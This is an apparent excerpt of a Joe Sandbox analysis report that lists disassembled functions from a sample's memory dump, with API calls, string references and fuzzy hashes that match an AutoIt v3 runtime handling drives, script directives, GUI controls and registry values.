Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 4eb6ed47760bf6a246dbbb6a3a8a0d62cc2dc417eb723dac59082cf2693b477e
Instruction ID: 7c2d6d259e43a567c8f8b5bab13b7bbdeaf9a02bcbb7cd2a82e07169f3d9478f
Opcode Fuzzy Hash: 4eb6ed47760bf6a246dbbb6a3a8a0d62cc2dc417eb723dac59082cf2693b477e
Instruction Fuzzy Hash: F4127C70504201DFDB25EF24C884BA9B7E6FF1A304F145569E98ACBA62D731EC86CF91

Function 0067DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0067DBD6
GetDriveTypeW.KERNEL32(?,006CDC54,?,\\.\,006CDC00), ref: 0067DCC3
SetErrorMode.KERNEL32(00000000,006CDC54,?,\\.\,006CDC00), ref: 0067DE29

Strings

SCSI, xrefs: 0067DD93
SATA, xrefs: 0067DDD9
iSCSI, xrefs: 0067DDCB
Fibre, xrefs: 0067DDB6
SSA, xrefs: 0067DDAF
FileBackedVirtual, xrefs: 0067DDF5
PhysicalDrive, xrefs: 0067DC67
RAID, xrefs: 0067DDC4
RAMDisk, xrefs: 0067DCED
SAS, xrefs: 0067DDD2
SSD, xrefs: 0067DD50
USB, xrefs: 0067DDBD
ATAPI, xrefs: 0067DD9A
Network, xrefs: 0067DD01
Fixed, xrefs: 0067DD0B
Virtual, xrefs: 0067DDEE
\\.\, xrefs: 0067DC2B
ATA, xrefs: 0067DDA1
Removable, xrefs: 0067DD15
MMC, xrefs: 0067DDE7
CDROM, xrefs: 0067DCF7
1394, xrefs: 0067DDA8
Unknown, xrefs: 0067DCE3, 0067DD8C

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: b77d388d86699054f83fdc5533851e1776e0638616b20183cdebec97d3ba9a91
Instruction ID: 2eb8f58eabc0cfe738ed4a27583fd4bab08c51cd7b7ed77d527628c5ed857d3f
Opcode Fuzzy Hash: b77d388d86699054f83fdc5533851e1776e0638616b20183cdebec97d3ba9a91
Instruction Fuzzy Hash: 09519030208352ABC220DF15CA86869B7B3FFA4740F219D1DF05B9B391DA71D946DB86

Function 0063CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0063CC68
__wcsnicmp.LIBCMT ref: 0063CC80
__wcsnicmp.LIBCMT ref: 0063CC98
__wcsnicmp.LIBCMT ref: 0063CCB0
__wcsnicmp.LIBCMT ref: 0063CCC8
__wcsnicmp.LIBCMT ref: 0063CCE0
__wcsnicmp.LIBCMT ref: 0063CCF8
__wcsnicmp.LIBCMT ref: 0063CD0C
__wcsnicmp.LIBCMT ref: 0063CD4D
__wcsnicmp.LIBCMT ref: 0063CD61
__wcsnicmp.LIBCMT ref: 0063CD75
__wcsnicmp.LIBCMT ref: 0063CD89

Strings

#notrayicon, xrefs: 0063CC7A
#include, xrefs: 0063CCDA
#comments-start, xrefs: 0063CCF2, 0063CD47
#include-once, xrefs: 0063CCC2
Unterminated group of comments, xrefs: 006A2FB4
#requireadmin, xrefs: 0063CC92
Cannot parse #include, xrefs: 006A2FA1
#comments-end, xrefs: 0063CD6F
Bad directive syntax error, xrefs: 006A2ECB
#pragma compile, xrefs: 0063CC62
#ce, xrefs: 0063CD83
#cs, xrefs: 0063CD06, 0063CD5B
#OnAutoItStartRegister, xrefs: 0063CCAA

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 695c53f82c3a08e2ef0f8c453d3577d32703bdc4fb453e6383bd7e777af7903a
Instruction ID: 6d04dfc6dc02710b7328e80f239bcc9828f4e335bef6ed85e3a93d80b8d7700f
Opcode Fuzzy Hash: 695c53f82c3a08e2ef0f8c453d3577d32703bdc4fb453e6383bd7e777af7903a
Instruction Fuzzy Hash: 2F81E730680206BBCB65BB64DC92FFB776BEF16710F05402DF906BA282EA60D945C7D5

Function 0069C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0069C788
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0069C83E
SendMessageW.USER32(?,00001102,00000002,?), ref: 0069C859
SendMessageW.USER32(?,000000F1,?,00000000), ref: 0069CB15

Strings

0, xrefs: 0069C89C

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 58c7baca1cc5c465603cce1f2fc11886594789f8854fe8452c92d6f30e1e79b8
Instruction ID: 1ccb3cbe4940a0c33f2354d6483591a206a99b17400805a6f70618af9de39239
Opcode Fuzzy Hash: 58c7baca1cc5c465603cce1f2fc11886594789f8854fe8452c92d6f30e1e79b8
Instruction Fuzzy Hash: FAF1D271104301AFEB218F28CC85BAABBEAFF49364F08062DF599D67A1D774C941DB91

Function 0069638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,006CDC00), ref: 00696449

Strings

HIDEDROPDOWN, xrefs: 00696520
TABLEFT, xrefs: 006964A7
EDITPASTE, xrefs: 0069675B
CHECK, xrefs: 0069668B
ADDSTRING, xrefs: 00696536
GETLINE, xrefs: 0069678B
GETSELECTED, xrefs: 006966C1
GETCURRENTSELECTION, xrefs: 00696603
SELECTSTRING, xrefs: 00696626
FINDSTRING, xrefs: 00696596
TABRIGHT, xrefs: 006964BD
SETCURRENTSELECTION, xrefs: 006965D6
GETLINECOUNT, xrefs: 006966E4
GETCURRENTCOL, xrefs: 00696724
SENDCOMMANDID, xrefs: 006967CA
DELSTRING, xrefs: 00696569
ISCHECKED, xrefs: 00696659
CURRENTTAB, xrefs: 006964DD
UNCHECK, xrefs: 006966A1
SHOWDROPDOWN, xrefs: 00696500
GETCURRENTLINE, xrefs: 00696704
ISENABLED, xrefs: 0069648C
ISVISIBLE, xrefs: 00696455

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: 7eb93df29a3fd654aded1b425c9901badf7809b0f4901806f145ad150af58ff4
Instruction ID: 697284f0da9e608472312af338f7bc3c0671941255285a43b4f8bbcd38814d1e
Opcode Fuzzy Hash: 7eb93df29a3fd654aded1b425c9901badf7809b0f4901806f145ad150af58ff4
Instruction Fuzzy Hash: 41C18E306043458BCF44EF20C591AAE77ABAF94344F00485DF8969B7A2DF21ED4BCB86

Function 0069D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0069D5AE
SetTextColor.GDI32(?,?), ref: 0069D5B2
GetSysColorBrush.USER32(0000000F), ref: 0069D5C8
GetSysColor.USER32(0000000F), ref: 0069D5D3
CreateSolidBrush.GDI32(?), ref: 0069D5D8
GetSysColor.USER32(00000011), ref: 0069D5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0069D5FE
SelectObject.GDI32(?,00000000), ref: 0069D60F
SetBkColor.GDI32(?,00000000), ref: 0069D618
SelectObject.GDI32(?,?), ref: 0069D625
InflateRect.USER32(?,000000FF,000000FF), ref: 0069D644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0069D65B
GetWindowLongW.USER32(00000000,000000F0), ref: 0069D670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0069D698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0069D6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 0069D6DD
DrawFocusRect.USER32(?,?), ref: 0069D6E8
GetSysColor.USER32(00000011), ref: 0069D6F6
SetTextColor.GDI32(?,00000000), ref: 0069D6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0069D712
SelectObject.GDI32(?,0069D2A5), ref: 0069D729
DeleteObject.GDI32(?), ref: 0069D734
SelectObject.GDI32(?,?), ref: 0069D73A
DeleteObject.GDI32(?), ref: 0069D73F
SetTextColor.GDI32(?,?), ref: 0069D745
SetBkColor.GDI32(?,?), ref: 0069D74F

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 85bef203ac64224f25c43b6b8544f80e43682c8869d2763d9c19f5a3fbfbcdfd
Instruction ID: 011037865130dc0d5b970f20daa34a523a5b7a20728033397effb95e8febefde
Opcode Fuzzy Hash: 85bef203ac64224f25c43b6b8544f80e43682c8869d2763d9c19f5a3fbfbcdfd
Instruction Fuzzy Hash: 0F512FB2900218BFDF109FA8DC48EEE7B7AEB08324F115625F915AB2A1E7759940DF50

Function 0069B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0069B7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0069B7C1
CharNextW.USER32(0000014E), ref: 0069B7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0069B831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0069B847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0069B858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0069B875
SetWindowTextW.USER32(?,0000014E), ref: 0069B8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0069B8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 0069B90E
_memset.LIBCMT ref: 0069B933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0069B97C
_memset.LIBCMT ref: 0069B9DB
SendMessageW.USER32 ref: 0069BA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 0069BA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 0069BB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 0069BB2C
GetMenuItemInfoW.USER32(?), ref: 0069BB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0069BBA3
DrawMenuBar.USER32(?), ref: 0069BBB2
SetWindowTextW.USER32(?,0000014E), ref: 0069BBDA

Strings

0, xrefs: 0069BB4F

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 22464943c16ac11a897ae21f85f0ebeaa1356ae7ea0d76342f810a22e3cce097
Instruction ID: be3b9defeba00c698f820135e168ca8ef287006a9da9ee54138fc38fd3dc5476
Opcode Fuzzy Hash: 22464943c16ac11a897ae21f85f0ebeaa1356ae7ea0d76342f810a22e3cce097
Instruction Fuzzy Hash: 94E1A275900208EBDF209F55DD84EEE7B7EFF05710F10925AF915AA690DB708981DF60

Function 00632EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00632F7A
IsWindow.USER32(?), ref: 006A22FD

Strings

T+n, xrefs: 006A220E
P+n, xrefs: 006A21E0
H+n, xrefs: 006A2184
HANDLE, xrefs: 006A20E2
CLASS, xrefs: 006A2128
TITLE, xrefs: 006A2292
REGEXPCLASS, xrefs: 006A2149
INSTANCE, xrefs: 006A223C
LAST, xrefs: 006A20B6
ACTIVE, xrefs: 006A20CC
ALL, xrefs: 006A2264
L+n, xrefs: 006A21B2
REGEXPTITLE, xrefs: 006A20F8

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$H+n$HANDLE$INSTANCE$L+n$LAST$P+n$REGEXPCLASS$REGEXPTITLE$T+n$TITLE
API String ID: 62970417-2195255517
Opcode ID: 64d7c7887208ca7946a54e0c0e807a655b5539e3be715ec0bdb8f85bb397b2cb
Instruction ID: ad2af59cd0a1a6f398087481c4b4b89eb359f4f3a931cd06a0b66f05cb2575a6
Opcode Fuzzy Hash: 64d7c7887208ca7946a54e0c0e807a655b5539e3be715ec0bdb8f85bb397b2cb
Instruction Fuzzy Hash: 99D1C5305082439BCB44EF24C8A1AEABBA7BF56344F004A1DF455576A1DB30ED9ACFD5

Function 0069764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0069778A
GetDesktopWindow.USER32 ref: 0069779F
GetWindowRect.USER32(00000000), ref: 006977A6
GetWindowLongW.USER32(?,000000F0), ref: 00697808
DestroyWindow.USER32(?), ref: 00697834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0069785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0069787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 006978A1
SendMessageW.USER32(?,00000421,?,?), ref: 006978B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 006978C9
IsWindowVisible.USER32(?), ref: 006978E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00697904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00697918
GetWindowRect.USER32(?,?), ref: 00697930
MonitorFromPoint.USER32(?,?,00000002), ref: 00697956
GetMonitorInfoW.USER32 ref: 00697970
CopyRect.USER32(?,?), ref: 00697987
SendMessageW.USER32(?,00000412,00000000), ref: 006979F2

Strings

tooltips_class32, xrefs: 00697856
(, xrefs: 00697965
0, xrefs: 00697735

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: d5e813669379f3031da3dbe7242c84a56133d012da0fbe21dbfeb640b4b208cf
Instruction ID: fc2abc4e777f7d1265aa10183b91982de0a8f2a46e720f85b671a9c4ef9da379
Opcode Fuzzy Hash: d5e813669379f3031da3dbe7242c84a56133d012da0fbe21dbfeb640b4b208cf
Instruction Fuzzy Hash: 92B1A171618301AFDB44DF64C948B6ABBEAFF88310F008A1DF5999B291E770E845CB95

Function 00676CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00676CFB
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00676D21
_wcscpy.LIBCMT ref: 00676D4F
_wcscmp.LIBCMT ref: 00676D5A
_wcscat.LIBCMT ref: 00676D70
_wcsstr.LIBCMT ref: 00676D7B
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00676D97
_wcscat.LIBCMT ref: 00676DE0
_wcscat.LIBCMT ref: 00676DE7
_wcsncpy.LIBCMT ref: 00676E12

Strings

%u.%u.%u.%u, xrefs: 00676E75
DefaultLangCodepage, xrefs: 00676DFA
StringFileInfo\, xrefs: 00676D6A
04090000, xrefs: 00676DCD
\VarFileInfo\Translation, xrefs: 00676D8F

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 66d32f449415ba91c62703ecca4e6a194c35912e447e867d5f81780559f825a7
Instruction ID: fc969ca973ff2d2a67f0e7fe7b236c18b49bb5bb2e3fab6cc964c802eaca9ebc
Opcode Fuzzy Hash: 66d32f449415ba91c62703ecca4e6a194c35912e447e867d5f81780559f825a7
Instruction Fuzzy Hash: 6841E172A00201BBEB50AB64CC47EBF77BEDF41710F14416DFD05A6282FB74DA0596AA

Function 0064A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0064A939
GetSystemMetrics.USER32(00000007), ref: 0064A941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0064A96C
GetSystemMetrics.USER32(00000008), ref: 0064A974
GetSystemMetrics.USER32(00000004), ref: 0064A999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0064A9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0064A9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0064A9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0064AA0D
GetClientRect.USER32(00000000,000000FF), ref: 0064AA2B
GetStockObject.GDI32(00000011), ref: 0064AA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 0064AA52

Part of subcall function 0064B63C: GetCursorPos.USER32(000000FF), ref: 0064B64F
Part of subcall function 0064B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0064B66C
Part of subcall function 0064B63C: GetAsyncKeyState.USER32(00000001), ref: 0064B691
Part of subcall function 0064B63C: GetAsyncKeyState.USER32(00000002), ref: 0064B69F

SetTimer.USER32(00000000,00000000,00000028,0064AB87), ref: 0064AA79

Strings

AutoIt v3 GUI, xrefs: 0064A9F1

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 8672106c4cdbed7f5d114fb3042d72c93e498ebd724e5d89838b519f2c463419
Instruction ID: 426d87e91731c3e46f4fa56719b2ce345214d49f462e996c3353f70650aeb85b
Opcode Fuzzy Hash: 8672106c4cdbed7f5d114fb3042d72c93e498ebd724e5d89838b519f2c463419
Instruction Fuzzy Hash: 46B15C71A4020AEFDB14DFA8CC45BEE7BB6FB09314F115229FA16EA290DB74D841CB51

Function 00693639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00693735
RegCreateKeyExW.ADVAPI32(?,?,00000000,006CDC00,00000000,?,00000000,?,?), ref: 006937A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 006937EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00693874
RegCloseKey.ADVAPI32(?), ref: 00693B94
RegCloseKey.ADVAPI32(00000000), ref: 00693BA1

Strings

REG_BINARY, xrefs: 00693B2F
REG_EXPAND_SZ, xrefs: 00693811
REG_DWORD, xrefs: 00693A65
REG_MULTI_SZ, xrefs: 0069395C
REG_QWORD, xrefs: 00693AE2
REG_SZ, xrefs: 006938B2

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 4dfa323dfbef5cf5ee1946113b238338692bf42e07d40f2853e7cb3df36f12a3
Instruction ID: 3625401750865458a8837b9b39e977ea0ff7af84ee152d3c956ecb6c7e8a10a5
Opcode Fuzzy Hash: 4dfa323dfbef5cf5ee1946113b238338692bf42e07d40f2853e7cb3df36f12a3
Instruction Fuzzy Hash: ED028D752006119FDB54EF24C991A6EB7EAFF88720F04845CF98A9B3A1CB30ED01CB95

Function 00696BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00696C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00696D16

Strings

GETITEMCOUNT, xrefs: 00696C84
SELECT, xrefs: 00696DA8
GETSELECTEDCOUNT, xrefs: 00696CF9
VIEWCHANGE, xrefs: 00696ECD
SELECTINVERT, xrefs: 00696DDE
DESELECT, xrefs: 00696DFC
GETSELECTED, xrefs: 00696E3C
SELECTCLEAR, xrefs: 00696D8D
GETSUBITEMCOUNT, xrefs: 00696CA1
ISSELECTED, xrefs: 00696D21
FINDITEM, xrefs: 00696E81
GETTEXT, xrefs: 00696CBF
SELECTALL, xrefs: 00696D75

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
